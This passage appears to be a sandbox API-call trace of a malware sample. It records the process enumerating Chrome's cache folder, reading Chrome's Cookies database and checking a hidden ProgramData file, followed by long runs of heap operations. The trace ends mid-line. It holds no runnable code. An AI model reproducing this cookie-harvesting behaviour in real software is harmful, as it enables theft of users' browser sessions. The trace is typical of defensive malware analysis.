[0137.158] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x50) returned 0x9144638 [0137.158] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x77) returned 0x45b370 [0137.158] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9144638 | out: hHeap=0x3f0000) returned 1 [0137.158] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x60) returned 0x4cd6e8 [0137.158] FindFirstFileA (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\*", lpFindFileData=0x36e158 | out: lpFindFileData=0x36e158*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x805aa0c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x805aa0c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x805aa0c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3f0000, dwReserved1=0x77c6e36c, cFileName=".", cAlternateFileName="")) returned 0x9148ab8 [0137.365] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4cd6e8 | out: hHeap=0x3f0000) returned 1 [0137.365] FindNextFileA (in: hFindFile=0x9148ab8, lpFindFileData=0x36e158 | out: lpFindFileData=0x36e158*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x805aa0c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x805aa0c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x805aa0c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3f0000, dwReserved1=0x77c6e36c, cFileName="..", cAlternateFileName="")) returned 1 [0137.366] FindNextFileA (in: hFindFile=0x9148ab8, lpFindFileData=0x36e158 | out: lpFindFileData=0x36e158*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x805aa0c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x805aa0c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x9c0e3de0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb000, dwReserved0=0x3f0000, dwReserved1=0x77c6e36c, cFileName="data_0", cAlternateFileName="")) returned 1 [0137.366] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x60) returned 0x4cd6e8 [0137.366] FindNextFileA (in: hFindFile=0x9148ab8, lpFindFileData=0x36e158 | out: lpFindFileData=0x36e158*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x805aa0c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x805aa0c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x9c0e3de0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x42000, dwReserved0=0x3f0000, dwReserved1=0x77c6e36c, cFileName="data_1", cAlternateFileName="")) returned 1 [0137.366] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x60) returned 0x4cd618 [0137.366] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4cd6e8 | out: hHeap=0x3f0000) returned 1 [0137.366] FindNextFileA (in: hFindFile=0x9148ab8, lpFindFileData=0x36e158 | out: lpFindFileData=0x36e158*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x805aa0c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x805aa0c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x805aa0c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x3f0000, dwReserved1=0x77c6e36c, cFileName="data_2", cAlternateFileName="")) returned 1 [0137.366] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x60) returned 0x4cd6e8 [0137.366] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4cd618 | out: hHeap=0x3f0000) returned 1 [0137.366] FindNextFileA (in: hFindFile=0x9148ab8, lpFindFileData=0x36e158 | out: lpFindFileData=0x36e158*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x805aa0c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x805aa0c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x9c0e3de0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x402000, dwReserved0=0x3f0000, dwReserved1=0x77c6e36c, cFileName="data_3", cAlternateFileName="")) returned 1 [0137.366] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x60) returned 0x4cd618 [0137.366] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4cd6e8 | out: hHeap=0x3f0000) returned 1 [0137.366] FindNextFileA (in: hFindFile=0x9148ab8, lpFindFileData=0x36e158 | out: lpFindFileData=0x36e158*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x805aa0c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x805aa0c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x805aa0c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x80170, dwReserved0=0x3f0000, dwReserved1=0x77c6e36c, cFileName="index", cAlternateFileName="")) returned 1 [0137.366] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x60) returned 0x4cd6e8 [0137.366] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4cd618 | out: hHeap=0x3f0000) returned 1 [0137.366] FindNextFileA (in: hFindFile=0x9148ab8, lpFindFileData=0x36e158 | out: lpFindFileData=0x36e158*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x805aa0c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x805aa0c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x805aa0c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x80170, dwReserved0=0x3f0000, dwReserved1=0x77c6e36c, cFileName="index", cAlternateFileName="")) returned 0 [0137.366] FindClose (in: hFindFile=0x9148ab8 | out: hFindFile=0x9148ab8) returned 1 [0137.366] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4cd6e8 | out: hHeap=0x3f0000) returned 1 [0137.366] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x45b370 | out: hHeap=0x3f0000) returned 1 [0137.366] FindNextFileA (in: hFindFile=0x9148a78, lpFindFileData=0x36e390 | out: lpFindFileData=0x36e390*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x80d406e0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x80d406e0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x98d1e730, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x1c00, dwReserved0=0x9148ab8, dwReserved1=0x13d180a, cFileName="Cookies", cAlternateFileName="")) returned 1 [0137.367] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x50) returned 0x9144638 [0137.367] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x77) returned 0x45b370 [0137.367] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9144638 | out: hHeap=0x3f0000) returned 1 [0137.367] GetFileAttributesA (lpFileName="C:\\ProgramData\\r9t8s3p6v6t8s3p6v6\\nlLJZYZ9" (normalized: "c:\\programdata\\r9t8s3p6v6t8s3p6v6\\nlljzyz9")) returned 0xffffffff [0137.367] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x48) returned 0x9150728 [0137.367] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\cookies"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0137.404] GetFileSize (in: hFile=0x5cc, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1c00 [0137.404] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x1c00) returned 0x9184ca0 [0137.404] ReadFile (in: hFile=0x5cc, lpBuffer=0x9184ca0, nNumberOfBytesToRead=0x1c00, lpNumberOfBytesRead=0x36e194, lpOverlapped=0x0 | out: lpBuffer=0x9184ca0*, lpNumberOfBytesRead=0x36e194*=0x1c00, lpOverlapped=0x0) returned 1 [0137.458] CloseHandle (hObject=0x5cc) returned 1 [0137.458] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x1) returned 0x90d56c0 [0137.458] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x2) returned 0x90d5700 [0137.458] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x90d56c0 | out: hHeap=0x3f0000) returned 1 [0137.458] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x3) returned 0x90d56c0 [0137.458] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x90d5700 | out: hHeap=0x3f0000) returned 1 [0137.458] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x4) returned 0x90d5700 [0137.458] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x90d56c0 | out: hHeap=0x3f0000) returned 1 [0137.459] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x6) returned 0x90d56c0 [0137.459] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x90d5700 | out: hHeap=0x3f0000) returned 1 [0137.459] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x9) returned 0x9126318 [0137.459] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x90d56c0 | out: hHeap=0x3f0000) returned 1 [0137.459] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0xd) returned 0x9126348 [0137.459] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9126318 | out: hHeap=0x3f0000) returned 1 [0137.459] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x13) returned 0x4151f0 [0137.459] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9126348 | out: hHeap=0x3f0000) returned 1 [0137.459] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x1c) returned 0x9175e40 [0137.459] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4151f0 | out: hHeap=0x3f0000) returned 1 [0137.459] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x2a) returned 0x9174ec8 [0137.459] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9175e40 | out: hHeap=0x3f0000) returned 1 [0137.459] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x3f) returned 0x9127be8 [0137.459] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174ec8 | out: hHeap=0x3f0000) returned 1 [0137.459] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x5e) returned 0x4cd6e8 [0137.459] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9127be8 | out: hHeap=0x3f0000) returned 1 [0137.459] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x8d) returned 0x401d10 [0137.459] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4cd6e8 | out: hHeap=0x3f0000) returned 1 [0137.459] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0xd3) returned 0x90d1020 [0137.459] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x401d10 | out: hHeap=0x3f0000) returned 1 [0137.459] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x13c) returned 0x445f58 [0137.459] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x90d1020 | out: hHeap=0x3f0000) returned 1 [0137.459] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x1da) returned 0x9145988 [0137.459] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x445f58 | out: hHeap=0x3f0000) returned 1 [0137.459] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x2c7) returned 0x912d780 [0137.459] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9145988 | out: hHeap=0x3f0000) returned 1 [0137.459] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x42a) returned 0x91868a8 [0137.459] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x912d780 | out: hHeap=0x3f0000) returned 1 [0137.459] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x63f) returned 0x9186ce0 [0137.459] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x91868a8 | out: hHeap=0x3f0000) returned 1 [0137.459] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x95e) returned 0x9187328 [0137.459] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9186ce0 | out: hHeap=0x3f0000) returned 1 [0137.459] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0xe0d) returned 0x9187c90 [0137.460] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9187328 | out: hHeap=0x3f0000) returned 1 [0137.460] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x1536) returned 0x9188aa8 [0137.460] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9187c90 | out: hHeap=0x3f0000) returned 1 [0137.460] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x1fbf) returned 0x91868a8 [0137.460] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9188aa8 | out: hHeap=0x3f0000) returned 1 [0137.460] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9184ca0 | out: hHeap=0x3f0000) returned 1 [0137.460] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x138) returned 0x44c018 [0137.460] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20) returned 0x9175e40 [0137.460] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174ec8 [0137.460] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9175e40 | out: hHeap=0x3f0000) returned 1 [0137.460] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x47) returned 0x9150778 [0137.460] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174ec8 | out: hHeap=0x3f0000) returned 1 [0137.460] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x6a) returned 0x9124180 [0137.460] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9150778 | out: hHeap=0x3f0000) returned 1 [0137.460] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20) returned 0x9175e40 [0137.460] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20) returned 0x9175e68 [0137.460] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174ec8 [0137.460] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9175e68 | out: hHeap=0x3f0000) returned 1 [0137.460] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x47) returned 0x9150778 [0137.460] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174ec8 | out: hHeap=0x3f0000) returned 1 [0137.460] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x6a) returned 0x9124360 [0137.460] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9150778 | out: hHeap=0x3f0000) returned 1 [0137.460] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x9e) returned 0x48f6b8 [0137.460] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9124360 | out: hHeap=0x3f0000) returned 1 [0137.460] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0xec) returned 0x91372c0 [0137.460] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x48f6b8 | out: hHeap=0x3f0000) returned 1 [0137.460] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x161) returned 0x4201d8 [0137.460] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x91372c0 | out: hHeap=0x3f0000) returned 1 [0137.460] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x211) returned 0x9145988 [0137.460] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4201d8 | out: hHeap=0x3f0000) returned 1 [0137.460] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20) returned 0x9175e68 [0137.460] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20) returned 0x9175e90 [0137.460] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174ec8 [0137.460] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9175e90 | out: hHeap=0x3f0000) returned 1 [0137.460] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20) returned 0x9175e90 [0137.460] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174f00 [0137.461] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9175e90 | out: hHeap=0x3f0000) returned 1 [0137.461] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x47) returned 0x9150778 [0137.461] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174f00 | out: hHeap=0x3f0000) returned 1 [0137.461] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x1b0) returned 0x4201d8 [0137.461] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20) returned 0x9175e90 [0137.461] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174f00 [0137.461] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9175e90 | out: hHeap=0x3f0000) returned 1 [0137.461] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x47) returned 0x91507c8 [0137.461] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174f00 | out: hHeap=0x3f0000) returned 1 [0137.461] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x18) returned 0x4151f0 [0137.461] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x40) returned 0x9127be8 [0137.461] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174f00 [0137.461] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20) returned 0x9175e90 [0137.461] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4151f0 | out: hHeap=0x3f0000) returned 1 [0137.461] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x48) returned 0x9150818 [0137.461] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20) returned 0x9175eb8 [0137.461] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174f00 | out: hHeap=0x3f0000) returned 1 [0137.461] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x60) returned 0x4cd6e8 [0137.461] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20) returned 0x9175ee0 [0137.461] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9150818 | out: hHeap=0x3f0000) returned 1 [0137.461] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x90) returned 0x401d10 [0137.461] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20) returned 0x9175f08 [0137.461] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4cd6e8 | out: hHeap=0x3f0000) returned 1 [0137.461] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20) returned 0x9175f30 [0137.461] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0xd8) returned 0x90d1020 [0137.461] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20) returned 0x9175f58 [0137.461] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x401d10 | out: hHeap=0x3f0000) returned 1 [0137.461] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20) returned 0x9175f80 [0137.461] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174f00 [0137.461] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x138) returned 0x4231c0 [0137.461] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174f38 [0137.461] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x90d1020 | out: hHeap=0x3f0000) returned 1 [0137.461] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174f70 [0137.461] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174fa8 [0137.461] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20) returned 0x9175fa8 [0137.461] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x1c8) returned 0x912d780 [0137.461] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174fe0 [0137.461] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4231c0 | out: hHeap=0x3f0000) returned 1 [0137.461] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x91507c8 | out: hHeap=0x3f0000) returned 1 [0137.461] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4201d8 | out: hHeap=0x3f0000) returned 1 [0137.461] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x40) returned 0x9127c30 [0137.462] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9127be8 | out: hHeap=0x3f0000) returned 1 [0137.462] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9127c30 | out: hHeap=0x3f0000) returned 1 [0137.462] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20) returned 0x9175fd0 [0137.462] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9175e90 | out: hHeap=0x3f0000) returned 1 [0137.462] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9175fd0 | out: hHeap=0x3f0000) returned 1 [0137.462] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20) returned 0x9175fd0 [0137.462] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9175eb8 | out: hHeap=0x3f0000) returned 1 [0137.462] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9175fd0 | out: hHeap=0x3f0000) returned 1 [0137.462] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20) returned 0x9175fd0 [0137.462] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9175ee0 | out: hHeap=0x3f0000) returned 1 [0137.462] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9175fd0 | out: hHeap=0x3f0000) returned 1 [0137.462] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20) returned 0x9175fd0 [0137.462] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9175f08 | out: hHeap=0x3f0000) returned 1 [0137.462] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9175fd0 | out: hHeap=0x3f0000) returned 1 [0137.462] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20) returned 0x9175fd0 [0137.462] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9175f30 | out: hHeap=0x3f0000) returned 1 [0137.462] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9175fd0 | out: hHeap=0x3f0000) returned 1 [0137.462] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20) returned 0x9175fd0 [0137.462] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9175f58 | out: hHeap=0x3f0000) returned 1 [0137.462] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9175fd0 | out: hHeap=0x3f0000) returned 1 [0137.462] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20) returned 0x9175fd0 [0137.462] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9175f80 | out: hHeap=0x3f0000) returned 1 [0137.462] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9175fd0 | out: hHeap=0x3f0000) returned 1 [0137.462] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9175018 [0137.462] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174f00 | out: hHeap=0x3f0000) returned 1 [0137.462] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9175018 | out: hHeap=0x3f0000) returned 1 [0137.462] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9175018 [0137.462] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174f38 | out: hHeap=0x3f0000) returned 1 [0137.462] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9175018 | out: hHeap=0x3f0000) returned 1 [0137.462] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9175018 [0137.462] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174f70 | out: hHeap=0x3f0000) returned 1 [0137.462] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9175018 | out: hHeap=0x3f0000) returned 1 [0137.462] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9175018 [0137.462] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174fa8 | out: hHeap=0x3f0000) returned 1 [0137.462] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9175018 | out: hHeap=0x3f0000) returned 1 [0137.462] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20) returned 0x9175fd0 [0137.462] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9175fa8 | out: hHeap=0x3f0000) returned 1 [0137.462] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9175fd0 | out: hHeap=0x3f0000) returned 1 [0137.462] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9175018 [0137.462] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174fe0 | out: hHeap=0x3f0000) returned 1 [0137.462] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9175018 | out: hHeap=0x3f0000) returned 1 [0137.462] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0xc) returned 0x9126348 [0137.463] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x8) returned 0x90d56c0 [0137.463] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x10) returned 0x9126318 [0137.463] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x90d56c0 | out: hHeap=0x3f0000) returned 1 [0137.463] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x18) returned 